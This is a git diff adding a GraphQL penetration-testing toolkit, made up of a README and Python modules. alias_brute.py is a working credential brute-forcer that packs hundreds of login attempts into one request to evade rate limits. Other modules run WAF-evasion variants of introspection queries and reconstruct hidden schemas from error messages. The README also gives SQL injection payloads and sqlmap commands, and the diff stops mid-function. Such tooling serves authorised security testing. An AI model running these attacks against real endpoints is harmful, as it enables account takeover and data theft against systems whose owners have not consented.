diff --git a/README.md b/README.md index 91d8457..2733835 100644 --- a/README.md +++ b/README.md @@ -1,37 +1,438 @@ # GraphQL-Scripts -This repository contains a series of useful scripts for pentesting GraphQL endpoints. +Security testing toolkit for GraphQL endpoints. Covers schema discovery, permission enumeration, query generation, SQL injection detection, and alias-based brute-forcing. -## Basic Information +> **Authorization only.** Run these tools exclusively on systems for which you have explicit written permission. -This repository contains two scripts: [qGen.py](https://github.com/gitblanc/GraphQL-Scripts/tree/main/qGen) and [effuzz.py](https://github.com/gitblanc/GraphQL-Scripts/tree/main/effuzz). -- `qGen.py` allows you to list all the methods available in your GraphQL schema and then generate a query to dump all possible information with a method (like `findAllUsers`). -- `effuzz.py` allows you to check permissions in all the methods of your GraphQL schema (similar output to `ffuf`). +--- -## Methodology to use +## Tools at a glance ->[!Important] ->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json` +| Tool | What it does | +|---|---| +| [qgen](#qgen) | Interactive query generator: lists schema methods and builds full queries | +| [effuzz](#effuzz) | Endpoint fuzzer: enumerates ops and checks accessibility (ffuf-style output) | +| [sqli](#sqli) | SQLi detector: tests string arguments with SQL payloads, writes sqlmap markers | +| [alias_brute](#alias_brute) | Alias brute-force: bypasses rate limiters via GraphQL alias batching | -- You can first run `effuzz.py` to check for interesting methods allowed for your session: +--- -```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql +## Requirements -[redacted] -getAllTests [Status: 401] [Size: 32] [Words: 5] [Lines: 1] -getAllUsers [Status: 400] [Size: 261] [Words: 25] [Lines: 1] #<----- This indicates a malformed query, so you have permissions for this one -getAllConfigs [Status: 200] [Size: 48] [Words: 15] [Lines: 1] #<----- You also have permissions for this one +- Python 3.7+ +- `requests` (all tools) +- `colorama` (optional — coloured output in `sqli`) + +```bash +pip install -r requirements.txt +``` + +--- + +## Project structure + +``` +GraphQL-Scripts/ +├── core/ +│ ├── introspection.py # Introspection fetch, bypass chain, error reconstruction, endpoint discovery +│ ├── http.py # Header parsing and cookie file helpers +│ └── output.py # ANSI colours and colorama re-exports +├── qgen/ +│ └── qgen.py # Interactive query generator +├── effuzz/ +│ └── effuzz.py # Endpoint fuzzer +├── sqli/ +│ └── sqli_detector.py # SQL injection detector +└── alias_brute/ + └── alias_brute.py # Alias-based brute-force +``` + +--- + +## Recommended workflow + +``` +1. effuzz → find the endpoint and map accessible operations +2. qgen → generate full queries for interesting methods +3. sqli → probe string arguments for SQL injection +4. alias_brute → brute-force if rate limiting is suspected +``` + +### End-to-end example + +```bash +# 1. Map accessible operations (auto-discovers endpoint if needed) +python3 effuzz/effuzz.py --url https://target.com \ + -H "Cookie: session=abc123" --filter-code 401 + +# 2. Check CSRF surface while we're at it +python3 effuzz/effuzz.py --url https://target.com/graphql --check-methods + +# 3. Generate queries for a method of interest +python3 qgen/qgen.py --url https://target.com/graphql \ + -H "Authorization: Bearer TOKEN" +# qgen $ use getUser + +# 4. Scan for SQLi +python3 sqli/sqli_detector.py https://target.com/graphql \ + '{"Authorization":"Bearer TOKEN"}' --crawl + +# 5. Brute-force a login (if rate limiting is bypassed via aliases) +python3 alias_brute/alias_brute.py https://target.com/graphql \ + --field login --username carlos --wordlist /usr/share/wordlists/rockyou.txt +``` + +--- + +## Introspection bypass + +All three tools (qgen, effuzz, sqli) share the same introspection layer from `core/introspection.py`. When a standard introspection query fails or is blocked, they automatically escalate through a chain of bypass strategies before giving up. + +### Strategy chain + +**POST JSON — 3 query forms × 7 `__schema` encoding variants (21 attempts)** + +| Query form | What it adds | +|---|---| +| Plain (default) | No directives section — works on most modern servers | +| Locations | `directives { name isRepeatable locations }` — Burp Suite form | +| On-star | `directives { name isRepeatable onField onOperation onFragment }` — older spec | + +| `__schema` variant | Example | +|---|---| +| Normal | `__schema {` | +| Newline | `__schema\n{` | +| Comment | `__schema #bypass\n{` | +| Double space | `__schema {` | +| Tab | `__schema\t{` | +| Compact | `__schema{` | +| Double newline | `__schema\n\n{` | + +The variant loop runs first (all three forms tried per variant) so a wrong query form is detected after 3 requests, not 21. + +**GET and POST form-urlencoded** (4 more attempts after POST JSON fails) + +Both bypass CORS preflight and are sometimes accepted when JSON POST is blocked at a WAF or CDN layer. + +### Error-based schema reconstruction + +If every introspection strategy fails, the tools fall back to reconstructing a partial schema from error messages: + +1. **Bogus-field probe** — sends `{ _zzz_nonexistent_probe }` and parses `"Did you mean X?"` suggestions to discover real field names. +2. **Wordlist batch** — sends batches of ~40 common field names; those that don't produce `"Cannot query field"` errors exist on the server. +3. **Required-arg discovery** — for each found field, parses `"Argument 'X' of required type 'T'"` errors to recover argument names and types. + +The result is a minimal schema that is enough to drive argument-level SQLi testing, even without introspection. + +--- + +## qgen + +Interactive CLI that fetches a GraphQL schema and generates complete query/mutation documents with all nested fields and example variable values. + +### Usage + +```bash +python3 qgen/qgen.py --url URL [options] +``` + +### Options + +| Flag | Description | +|---|---| +| `--url URL` | GraphQL endpoint URL (required) | +| `-H "Name: Value"` | HTTP header, repeatable | +| `--cookie FILE` | Cookie file (one line) | + +qgen runs the full [introspection bypass chain](#introspection-bypass) automatically. If every strategy fails it falls back to error-based schema reconstruction. The strategy used is printed only when it differs from a plain POST (i.e. when a bypass was needed). + +### Interactive commands + +| Command | Description | +|---|---| +| `listMethods` | List all query `(Q)` and mutation `(M)` methods | +| `listMethods \| grep ` | Filter the list | +| `use ` | Generate the full query for that method and save it | +| `help` | Show command list | +| `exit` | Quit | + +### Example session + +``` +$ python3 qgen/qgen.py --url https://target.com/graphql \ + -H "Authorization: Bearer TOKEN" + +[*] Fetching introspection from https://target.com/graphql ... +[+] Schema obtained. +[+] Schema loaded: 42 queries, 8 mutations + +qgen $ listMethods | grep user + [3] (Q) getUser + [4] (Q) listUsers + [14] (M) createUser + +qgen $ use 3 +[+] Selected: getUser + +---------------------------------------- +query getUser($id: ID!) { + getUser(id: $id) { + id + username + email + role + } +} +---------------------------------------- +[+] Query saved to: queries/getUser.txt +``` + +Generated queries are saved to `queries/.txt`. + +--- + +## effuzz + +Lightweight GraphQL fuzzer. Fetches the schema, enumerates every query and mutation, and sends a minimal request for each to gauge accessibility — similar to ffuf but for GraphQL operations. + +### Usage + +```bash +python3 effuzz/effuzz.py --url URL [options] ``` - -- Once you obtained those methods which might interest you, you can run `qGen.py` and generate a query for that method: -```shell -python3 qGen.py --introspection /path/to/introspection_schema.json +### Options + +| Flag | Description | +|---|---| +| `--url URL` | GraphQL endpoint URL or base URL (e.g. `https://target.com`) | +| `--check-methods` | Test GET query-param and form-urlencoded POST support (CSRF surface) | +| `-H "Name: Value"` | HTTP header, repeatable | +| `--cookie FILE` | Cookie file (one line) | +| `--variables FILE` | JSON file with variables to include in every request | +| `-s / --silent` | Hide 401 responses | +| `--match-code CODES` | Show only these status codes (e.g. `200,400`) | +| `--filter-code CODES` | Hide these status codes (e.g. `401,403`) | +| `--debug` | Print full response body for each request | + +### Auto-discovery -[redacted] -qGen $ use getAllUsers -qGen $ genQuery +If `--url` doesn't respond as a GraphQL endpoint, effuzz automatically probes these paths and uses the first one that replies with a valid `__typename`: + +``` +/graphql /api/graphql /graphiql /graphql/console +/api /graphql/api /graphql/graphql /graphql.php ``` -- Now you can copy the query generated and paste it into BurpSuite, PostMan or GraphiQL. +You can pass either the full endpoint (`https://target.com/graphql`) or just the base URL (`https://target.com`) — discovery handles both. + +### --check-methods (CSRF surface) + +Tests two request types that bypass CORS preflight: + +1. **GET** with `?query={__typename}` — exploitable without preflight if accepted +2. **POST** with `Content-Type: application/x-www-form-urlencoded` — same + +If either is accepted and auth relies solely on session cookies, CSRF is likely possible. + +### Examples + +```bash +# Auto-discover endpoint and fuzz (pass base URL or full path — both work) +python3 effuzz/effuzz.py --url https://target.com \ + -H "Authorization: Bearer TOKEN" + +# Check CSRF surface +python3 effuzz/effuzz.py --url https://target.com/graphql --check-methods + +# Show only accessible methods +python3 effuzz/effuzz.py --url https://target.com/graphql \ + --filter-code 401,403 -H "Authorization: Bearer TOKEN" + +# Debug: print full response body for each method +python3 effuzz/effuzz.py --url https://target.com/graphql --match-code 200 --debug +``` + +### Output interpretation + +| Status | Meaning | +|---|---| +| `200` (green) | Request succeeded, response has no `errors` | +| `200` (yellow) | Request reached the server but response contains `errors` | +| `400` | Malformed query — server accepted the request; method likely exists | +| `401` / `403` | Authentication or authorisation required | +| `500` | Server error — worth investigating | + +--- + +## sqli + +SQL injection detector for GraphQL. Performs introspection, seeds argument values via optional BFS crawling, and tests every string-type argument with a curated set of SQL payloads. Writes reproducible `.http` marker files for sqlmap. + +If introspection fails on the given URL, sqli silently probes common GraphQL paths for the endpoint before falling back to error-based schema reconstruction. + +### Usage + +```bash +python3 sqli/sqli_detector.py [headers] [options] +``` + +### Options + +| Flag | Description | +|---|---| +| `endpoint` | GraphQL endpoint URL (required) | +| `headers` | Optional headers: JSON object string or `"Name: Value"` pairs | +| `--crawl` | BFS crawl to extract real values for smarter argument seeding | +| `--crawl-depth N` | BFS depth (default: 2) | +| `--max-requests N` | Request cap during crawl (default: 250) | +| `--max-items N` | Items per list to inspect (default: 10) | +| `--crawl-delay S` | Delay between requests in seconds (default: 0) | +| `--verbose` | Print queries and debug information | + +### Payloads tested + +``` +'" OR "1"="1 ' OR '1'='1 ' OR 1=1-- +admin' -- x' UNION SELECT NULL-- +"' OR 1=1 -- ' admin'/* admin"/* +``` + +### Evidence types + +| Type | Description | +|---|---| +| `SQL_ERROR` | SQL error message appears in the GraphQL `errors` array | +| `RESPONSE_DIFF` | Full-selection attack response differs from baseline | +| `NULL_ON_ATTACK` | Attack returns null while baseline returned data | +| `RESPONSE_DIFF_SIMPLE` | `__typename` differs between baseline and attack | + +All evidence types go through confirmation rules to reduce false positives before being reported. + +Each finding in the summary shows the payload, its evidence type (`SQL_ERROR`, `RESPONSE_DIFF`, etc.), and the truncated evidence text. Severity is rated `high` (confidence ≥ 0.75), `medium` (≥ 0.45), or `low`. + +### Examples + +```bash +# Basic scan +python3 sqli/sqli_detector.py https://target.com/graphql \ + '{"Authorization":"Bearer TOKEN"}' + +# With crawling for better argument seeding +python3 sqli/sqli_detector.py https://target.com/graphql \ + '{"Authorization":"Bearer TOKEN"}' \ + --crawl --crawl-depth 3 --max-requests 500 + +# Verbose (see every query sent) +python3 sqli/sqli_detector.py https://target.com/graphql --verbose +``` + +### Marker files and sqlmap + +Findings are saved to `repro-payloads/___marker.http`. Each file is a raw HTTP POST with the payload replaced by `*` — ready for sqlmap: + +```bash +sqlmap --level 5 --risk 3 \ + -r repro-payloads/user_username_abc12345_marker.http \ + -p "JSON[query]" --batch --skip-urlencode --parse-errors --random-agent +``` + +An index of all findings is kept at `repro-payloads/index.json`. + +--- + +## alias_brute + +Bypasses GraphQL rate limiters by batching hundreds of login attempts as aliases inside a **single HTTP request**. Rate limiters that count HTTP requests but not operations per request are trivially bypassed. + +### How it works + +```graphql +mutation { + bruteforce0: login(input: {username: "carlos", password: "123456"}) { token } + bruteforce1: login(input: {username: "carlos", password: "password"}) { token } + bruteforce2: login(input: {username: "carlos", password: "qwerty"}) { token } + ...100 more per request... +} +``` + +One HTTP request contains 100 attempts. A 10 req/s rate limit becomes effectively 1 000 attempts/s. + +### Usage + +```bash +python3 alias_brute/alias_brute.py \ + --field FIELD --username USER --wordlist FILE [options] +``` + +### Options + +| Flag | Description | +|---|---| +| `endpoint` | GraphQL endpoint URL (required) | +| `--field NAME` | Mutation/query field to target (e.g. `login`) | +| `--arg-user NAME` | Username argument name (default: `username`) | +| `--arg-pass NAME` | Password argument name (default: `password`) | +| `--username VALUE` | Username for all attempts | +| `--wordlist FILE` | Password wordlist, one per line | +| `--success-field NAME` | Field to check for non-null value (default: `token`) | +| `--operation TYPE` | `mutation` or `query` (default: `mutation`) | +| `--batch-size N` | Aliases per HTTP request (default: 100, max: 1000) | +| `--no-input-wrapper` | Use flat args instead of `input: {...}` wrapper | +| `-H "Name: Value"` | HTTP header, repeatable | +| `--cookie FILE` | Cookie file (one line) | +| `--timeout S` | Request timeout in seconds (default: 30) | +| `--verbose` | Print generated payload before each batch | + +### Examples + +```bash +# Standard login with 'input' wrapper (most common) +python3 alias_brute/alias_brute.py https://target.com/graphql \ + --field login \ + --username carlos \ + --wordlist /usr/share/wordlists/rockyou.txt \ + -H "Authorization: Bearer UNAUTHENTICATED_TOKEN" + +# Flat args (no 'input' wrapper) +python3 alias_brute/alias_brute.py https://target.com/graphql \ + --field authenticate \ + --arg-user email --arg-pass password \ + --username admin@target.com \ + --wordlist passwords.txt \ + --no-input-wrapper + +# Check 'success' field instead of 'token' +python3 alias_brute/alias_brute.py https://target.com/graphql \ + --field login --username carlos \ + --wordlist passwords.txt \ + --success-field jwt +``` + +### Sample output + +``` +[*] Target: https://target.com/graphql +[*] Operation: mutation { login(input: {...}) } +[*] Username: carlos +[*] Wordlist: 500 passwords +[*] Batch size: 100 aliases/request → 5 request(s) +[*] Success on: non-null 'token' + +[*] Batch 1/5 (#1–#100)... HTTP 200 (no hit) +[*] Batch 2/5 (#101–#200)... HTTP 200 (no hit) +[*] Batch 3/5 (#201–#300)... HTTP 200 + +[+] SUCCESS — alias bruteforce47 + Password: letmein + token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9... +``` + +--- + +## Security & ethics + +- These tools **actively probe targets**. Use them only on systems you are authorised to test. +- Automated scanning can trigger alarms, rate limits, account lockouts, or WAF bans. +- Inspect `.http` marker files before running sqlmap or any other automated follow-up tool. +- These tools are intended for authorised penetration testing, CTF competitions, and security research. diff --git a/alias_brute/__init__.py b/alias_brute/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/alias_brute/alias_brute.py b/alias_brute/alias_brute.py new file mode 100644 index 0000000..915346f --- /dev/null +++ b/alias_brute/alias_brute.py @@ -0,0 +1,232 @@ +#!/usr/bin/env python3 +""" +alias_brute.py — GraphQL alias-based brute-force for rate limit bypass. + +GraphQL aliases let you run the same field multiple times with different arguments +in a single HTTP request: + + mutation { + bruteforce0: login(input: {username: "carlos", password: "123456"}) { token } + bruteforce1: login(input: {username: "carlos", password: "password"}) { token } + ... + } + +A rate limiter that counts HTTP requests will see only one request, not hundreds. +Detection: the first alias whose success field is non-null is flagged as the hit. +""" + +import json +import os +import sys +import argparse +from typing import List, Optional, Tuple + +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +import requests + +from core.http import build_headers +from core.output import GREEN, RED, YELLOW, CYAN, RESET + + +def build_alias_payload(field: str, + arg_user: str, + arg_pass: str, + username: str, + passwords: List[str], + success_fields: List[str], + operation: str = "mutation", + use_input_wrapper: bool = True) -> str: + """Build a GraphQL document with one alias per password entry.""" + selection = " ".join(success_fields) if success_fields else "__typename" + aliases = [] + for i, pw in enumerate(passwords): + escaped_user = json.dumps(username) + escaped_pass = json.dumps(pw) + if use_input_wrapper: + args_str = f"input: {{{arg_user}: {escaped_user}, {arg_pass}: {escaped_pass}}}" + else: + args_str = f"{arg_user}: {escaped_user}, {arg_pass}: {escaped_pass}" + aliases.append( + f" bruteforce{i}: {field}({args_str}) {{ {selection} }}" + ) + return f"{operation} {{\n" + "\n".join(aliases) + "\n}" + + +def send_batch(url: str, headers: dict, query: str, timeout: int = 30) -> Optional[requests.Response]: + try: + return requests.post(url, headers=headers, json={"query": query}, timeout=timeout) + except requests.exceptions.RequestException as e: + print(f"\n[!] Request error: {e}", file=sys.stderr) + return None + + +def find_success(response_data: dict, + batch_offset: int, + passwords: List[str], + success_field: str) -> Tuple[Optional[int], Optional[str], Optional[str]]: + """Scan alias responses for a non-null success_field. + + Returns (alias_index, password, value) or (None, None, None). + """ + if not isinstance(response_data, dict): + return None, None, None + data = response_data.get("data") or {} + if not isinstance(data, dict): + return None, None, None + + for alias_key, alias_data in data.items(): + if not alias_key.startswith("bruteforce"): + continue + try: + i = int(alias_key[len("bruteforce"):]) + except ValueError: + continue + if not isinstance(alias_data, dict): + continue + value = alias_data.get(success_field) + if value is not None: + pw_index = batch_offset + i + if pw_index < len(passwords): + return i, passwords[pw_index], str(value) + return None, None, None + + +def main(): + parser = argparse.ArgumentParser( + description="GraphQL alias brute-force — bypass rate limiting via alias batching", + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=( + "Examples:\n" + " python3 alias_brute/alias_brute.py https://target.com/graphql \\\n" + " --field login --username carlos --wordlist passwords.txt\n\n" + " # Flat args (no 'input' wrapper):\n" + " python3 alias_brute/alias_brute.py https://target.com/graphql \\\n" + " --field login --username carlos --wordlist passwords.txt --no-input-wrapper\n" + ), + ) + parser.add_argument("endpoint", help="GraphQL endpoint URL") + parser.add_argument("--field", required=True, + help="Mutation/query field to target (e.g. login)") + parser.add_argument("--arg-user", default="username", + help="Username argument name (default: username)") + parser.add_argument("--arg-pass", default="password", + help="Password argument name (default: password)") + parser.add_argument("--username", required=True, + help="Username value for all attempts") + parser.add_argument("--wordlist", required=True, + help="Wordlist file — one password per line") + parser.add_argument("--success-field", default="token", + help="Field to check for non-null value to detect success (default: token)") + parser.add_argument("--operation", default="mutation", + choices=["mutation", "query"], + help="GraphQL operation type (default: mutation)") + parser.add_argument("--batch-size", type=int, default=100, + help="Aliases per HTTP request (default: 100)") + parser.add_argument("--no-input-wrapper", dest="input_wrapper", + action="store_false", + help="Use flat args instead of 'input: {...}' wrapper") + parser.set_defaults(input_wrapper=True) + parser.add_argument("-H", "--header", action="append", default=[], + metavar="Name: Value", + help="HTTP header (repeatable)") + parser.add_argument("--cookie", metavar="FILE", help="Cookie file (one line)") + parser.add_argument("--timeout", type=int, default=30, + help="Request timeout in seconds (default: 30)") + parser.add_argument("--verbose", action="store_true", + help="Print the generated payload before each batch") + args = parser.parse_args() + + # --- Validate --- + if not 1 <= args.batch_size <= 1000: + print("[!] --batch-size must be between 1 and 1000.", file=sys.stderr) + sys.exit(1) + + if not os.path.isfile(args.wordlist): + print(f"[!] Wordlist not found: {args.wordlist!r}", file=sys.stderr) + sys.exit(1) + + if args.cookie and not os.path.isfile(args.cookie): + print(f"[!] Cookie file not found: {args.cookie!r}", file=sys.stderr) + sys.exit(1) + + with open(args.wordlist, "r", encoding="utf-8", errors="replace") as f: + passwords = [line.rstrip("\n\r") for line in f if line.strip()] + + if not passwords: + print("[!] Wordlist is empty.", file=sys.stderr) + sys.exit(1) + + headers = build_headers(args.header, args.cookie) + success_fields = [args.success_field] + + total = len(passwords) + batch_size = args.batch_size + num_batches = (total + batch_size - 1) // batch_size + wrapper_note = "input: {...}" if args.input_wrapper else "flat args" + + print(f"[*] Target: {args.endpoint}") + print(f"[*] Operation: {args.operation} {{ {args.field}({wrapper_note}) }}") + print(f"[*] Username: {args.username}") + print(f"[*] Wordlist: {total} passwords") + print(f"[*] Batch size: {batch_size} aliases/request → {num_batches} request(s)") + print(f"[*] Success on: non-null '{args.success_field}'") + print() + + for batch_num in range(num_batches): + offset = batch_num * batch_size + batch_passwords = passwords[offset:offset + batch_size] + + query = build_alias_payload( + args.field, args.arg_user, args.arg_pass, + args.username, batch_passwords, + success_fields, args.operation, args.input_wrapper, + ) + + if args.verbose: + print(f"--- Payload (batch {batch_num + 1}/{num_batches}) ---") + print(query) + print("---") + + print( + f"[*] Batch {batch_num + 1}/{num_batches} " + f"(#{offset + 1}–#{offset + len(batch_passwords)})...", + end="", flush=True, + ) + + resp = send_batch(args.endpoint, headers, query, timeout=args.timeout) + if resp is None: + print(f" {RED}FAILED{RESET}") + continue + + print(f" HTTP {resp.status_code}", end="") + + try: + data = resp.json() + except ValueError: + print(" (non-JSON response)") + continue + + alias_idx, matched_pw, matched_val = find_success( + data, offset, passwords, args.success_field + ) + + if matched_pw is not None: + print() + print(f"\n{GREEN}[+] SUCCESS{RESET} — alias bruteforce{alias_idx}") + print(f" Password: {YELLOW}{matched_pw}{RESET}") + print(f" {args.success_field}: {matched_val}") + return + + errors = (data.get("errors") or []) if isinstance(data, dict) else [] + if errors and isinstance(errors[0], dict): + first_msg = errors[0].get("message", "")[:80] + print(f" — {first_msg}") + else: + print(" (no hit)") + + print(f"\n{RED}[-] No valid credentials found across {total} attempt(s).{RESET}") + + +if __name__ == "__main__": + main() diff --git a/core/__init__.py b/core/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/http.py b/core/http.py new file mode 100644 index 0000000..5c32629 --- /dev/null +++ b/core/http.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python3 +"""Shared HTTP helpers: header parsing and cookie file loading.""" + +import json +import os +import re +import sys +from typing import Dict, List, Optional + + +def parse_header_args(headers_list: List[str]) -> Dict[str, str]: + """Parse a list of 'Name: Value' strings (from argparse action=append) into a dict. + + Last value wins on duplicates. + """ + hdrs: Dict[str, str] = {} + for h in headers_list or []: + if ":" not in h: + print(f"[!] Ignoring malformed header (expected 'Name: Value'): {h!r}", + file=sys.stderr) + continue + name, value = h.split(":", 1) + hdrs[name.strip()] = value.strip() + return hdrs + + +def parse_headers_input(h) -> Dict[str, str]: + """Parse headers from several formats accepted by sqli_detector. + + Handles: + - None / empty string → {} + - JSON object string → {"Authorization": "Bearer x", ...} + - JSON array of dicts → [{...}, ...] + - Semicolon/comma-separated 'Name: Value' pairs + """ + if not h: + return {} + if isinstance(h, list): + return parse_header_args(h) + if isinstance(h, str): + try: + parsed = json.loads(h) + if isinstance(parsed, dict): + return parsed + if isinstance(parsed, list): + result: Dict[str, str] = {} + for item in parsed: + if isinstance(item, dict): + result.update(item) + return result + except (ValueError, TypeError): + pass + result = {} + for part in re.split(r"[;,]", h): + part = part.strip() + if not part: + continue + if ":" in part: + k, v = part.split(":", 1) + result[k.strip()] = v.strip() + return result + return {} + + +def load_cookie_file(path: str) -> Optional[str]: + """Read a one-line cookie file. Returns the cookie string or None.""" + if not os.path.isfile(path): + print(f"[!] Cookie file not found: {path}", file=sys.stderr) + return None + with open(path, "r", encoding="utf-8") as f: + value = f.read().strip() + return value or None + + +def build_headers(headers_list: Optional[List[str]] = None, + cookie_file: Optional[str] = None) -> Dict[str, str]: + """Build an HTTP headers dict. + + Always includes Content-Type: application/json. Merges -H style args and + an optional cookie file. An explicit Cookie header via -H takes precedence + over the cookie file. + """ + hdrs: Dict[str, str] = {"Content-Type": "application/json"} + if headers_list: + hdrs.update(parse_header_args(headers_list)) + if cookie_file and "Cookie" not in hdrs: + cookie = load_cookie_file(cookie_file) + if cookie: + hdrs["Cookie"] = cookie + return hdrs diff --git a/core/introspection.py b/core/introspection.py new file mode 100644 index 0000000..4bae14f --- /dev/null +++ b/core/introspection.py @@ -0,0 +1,390 @@ +#!/usr/bin/env python3 +"""Shared introspection helpers: fetch, bypass, and schema extraction.""" + +from __future__ import annotations + +import json +import re +import sys +from typing import Any, Dict, List, Optional, Tuple +from urllib.parse import quote, urlparse, urlunparse + +try: + import requests +except ImportError: + requests = None # type: ignore + +# ── Query forms ─────────────────────────────────────────────────────────────── +# +# INTROSPECTION_QUERY — no directives; works on most modern servers. +# INTROSPECTION_QUERY_LOCATIONS — adds `directives { locations }` (Burp form). +# INTROSPECTION_QUERY_ON_STAR — adds `directives { onField onOperation onFragment }` +# (older GraphQL spec; some servers require these). + +INTROSPECTION_QUERY = """ +query IntrospectionQuery { + __schema { + queryType { name } + mutationType { name } + types { + kind + name + fields(includeDeprecated: true) { + name + args { + name + type { kind name ofType { kind name ofType { kind name } } } + } + type { kind name ofType { kind name } } + } + inputFields { + name + description + defaultValue + type { kind name ofType { kind name ofType { kind name } } } + } + enumValues { + name + } + } + } +} +""" + +INTROSPECTION_QUERY_LOCATIONS = INTROSPECTION_QUERY.replace( + " queryType { name }", + " queryType { name }\n directives { name isRepeatable locations }", + 1, +) + +INTROSPECTION_QUERY_ON_STAR = INTROSPECTION_QUERY.replace( + " queryType { name }", + " queryType { name }\n directives { name isRepeatable onField onOperation onFragment }", + 1, +) + + +# ── Internal helpers ────────────────────────────────────────────────────────── + +def _is_valid_introspection(data: Any) -> bool: + if not isinstance(data, dict): + return False + if isinstance(data.get("data"), dict) and "__schema" in data["data"]: + schema = data["data"]["__schema"] + return bool(schema and schema.get("types")) + if "__schema" in data: + return bool(data["__schema"] and data["__schema"].get("types")) + return False + + +def _apply_schema_bypass(query: str, variant: str) -> str: + """Rewrite the `__schema {` token with a whitespace/comment variant.""" + table = { + "newline": " __schema\n{", + "newline2": " __schema\n\n{", + "double-space": " __schema {", + "tab": " __schema\t{", + "comment": " __schema #bypass\n{", + "compact": " __schema{", + } + replacement = table.get(variant) + return query.replace(" __schema {", replacement, 1) if replacement else query + + +def _post_json(url: str, h: Dict[str, str], query: str, timeout: int) -> Optional[Dict]: + try: + resp = requests.post(url, headers=h, json={"query": query}, timeout=timeout) + return resp.json() + except Exception: + return None + + +def _get_query(url: str, h: Dict[str, str], query: str, timeout: int) -> Optional[Dict]: + no_ct = {k: v for k, v in h.items() if k.lower() != "content-type"} + try: + resp = requests.get(url, headers=no_ct, params={"query": query}, timeout=timeout) + return resp.json() + except Exception: + return None + + +def _post_form(url: str, h: Dict[str, str], query: str, timeout: int) -> Optional[Dict]: + form_h = {k: v for k, v in h.items() if k.lower() != "content-type"} + form_h["Content-Type"] = "application/x-www-form-urlencoded" + try: + resp = requests.post(url, headers=form_h, data=f"query={quote(query)}", timeout=timeout) + return resp.json() + except Exception: + return None + + +# ── Public API ──────────────────────────────────────────────────────────────── + +def fetch_with_bypass(url: str, headers: Dict[str, str], + timeout: int = 15) -> Tuple[Optional[Dict[str, Any]], Optional[str]]: + """Try every bypass strategy in priority order. Return (data, strategy) or (None, None). + + Returns "normal" when the plain POST succeeds without any bypass. + Otherwise returns a descriptive tag like "post-json/newline", + "post-json/locations/comment", "get/newline", "post-form", etc. + + Strategy order: all query forms with each bypass variant before moving to the + next variant — so a wrong query form is detected after just 3 requests. + + POST JSON variants: + bypass × {normal, newline, comment, double-space, tab, compact, newline2} + form × {plain, locations, on-star} + GET and POST form-urlencoded: + plain form × {normal, newline} + """ + if requests is None: + return None, None + + h = {"Content-Type": "application/json"} + h.update(headers or {}) + + _forms = [ + ("plain", INTROSPECTION_QUERY), + ("locations", INTROSPECTION_QUERY_LOCATIONS), + ("on-star", INTROSPECTION_QUERY_ON_STAR), + ] + _variants = ["normal", "newline", "comment", "double-space", "tab", "compact", "newline2"] + + # Build strategy list: iterate variant-first so all forms are tried per variant. + strategies: List[Tuple[str, str, str, str]] = [] + for variant in _variants: + for form_label, base_query in _forms: + q = base_query if variant == "normal" else _apply_schema_bypass(base_query, variant) + strategies.append((form_label, q, variant, "post-json")) + + for variant in ["normal", "newline"]: + q = INTROSPECTION_QUERY if variant == "normal" else _apply_schema_bypass(INTROSPECTION_QUERY, variant) + strategies.append(("plain", q, variant, "get")) + strategies.append(("plain", q, variant, "post-form")) + + for form_label, query_str, variant, method in strategies: + if method == "post-json": + data = _post_json(url, h, query_str, timeout) + elif method == "get": + data = _get_query(url, h, query_str, timeout) + else: + data = _post_form(url, h, query_str, timeout) + + if data and _is_valid_introspection(data): + if method == "post-json" and form_label == "plain" and variant == "normal": + return data, "normal" + tag = method + if form_label != "plain": + tag += f"/{form_label}" + if variant != "normal": + tag += f"/{variant}" + return data, tag + + return None, None + + +# ── Error-based schema reconstruction ──────────────────────────────────────── + +_DEFAULT_WORDLIST = [ + "id", "user", "users", "me", "profile", "account", "accounts", + "viewer", "node", "nodes", + "post", "posts", "article", "articles", "comment", "comments", + "message", "messages", "chat", "conversation", + "product", "products", "order", "orders", "item", "items", "cart", + "search", "query", "find", "list", + "create", "update", "delete", "add", "remove", "edit", + "login", "logout", "register", "auth", "token", "session", + "admin", "settings", "config", "info", "status", "health", + "file", "files", "upload", "download", "image", "images", + "paste", "pastes", "audit", "audits", + "systemHealth", "systemDebug", "systemUpdate", + "readAndBurn", "deleteAllPastes", +] + + +def reconstruct_schema_from_errors( + url: str, + headers: Dict[str, str], + timeout: int = 20, + wordlist: Optional[List[str]] = None, + verbose: bool = False, +) -> Optional[Dict[str, Any]]: + """Partially reconstruct the schema when introspection is disabled. + + 1. Bogus-field probe → parse "Did you mean X?" suggestions. + 2. Wordlist batch → fields that don't get "Cannot query field" exist. + 3. Required-arg probe → per field, extract arg names/types from error messages. + + Returns a minimal introspection-shaped dict or None. + """ + if requests is None: + return None + if wordlist is None: + wordlist = _DEFAULT_WORDLIST + + h = {"Content-Type": "application/json"} + h.update(headers or {}) + + root_type_name = "Query" + try: + resp = requests.post(url, headers=h, json={"query": "{__typename}"}, timeout=timeout) + typename = (resp.json().get("data") or {}).get("__typename") + if typename: + root_type_name = typename + except Exception: + pass + + if verbose: + print(f"[*] Error-based reconstruction — root type: {root_type_name}") + + discovered: set = set() + + # Technique 1 — bogus field → "Did you mean X?" + try: + resp = requests.post(url, headers=h, + json={"query": "{ _zzz_nonexistent_probe_abc123 }"}, timeout=timeout) + for error in (resp.json().get("errors") or []): + for m in re.findall(r'Did you mean (?:\"([^\"]+)\"|\'([^\']+)\')', + error.get("message", "")): + discovered.add(m[0] or m[1]) + except Exception: + pass + + # Technique 2 — wordlist batches + for i in range(0, len(wordlist), 15): + batch = wordlist[i: i + 15] + try: + resp = requests.post(url, headers=h, + json={"query": "{ " + " ".join(batch) + " }"}, timeout=timeout) + rjson = resp.json() + errored: set = set() + for e in (rjson.get("errors") or []): + msg = e.get("message", "") + for m in re.findall(r'Did you mean (?:\"([^\"]+)\"|\'([^\']+)\')', msg): + discovered.add(m[0] or m[1]) + m2 = re.search(r'Cannot query field ["\']([^"\']+)["\']', msg) + if m2: + errored.add(m2.group(1)) + for fname in batch: + if fname in (rjson.get("data") or {}): + discovered.add(fname) + elif fname not in errored: + for e in (rjson.get("errors") or []): + if fname in str(e.get("path") or []): + discovered.add(fname) + except 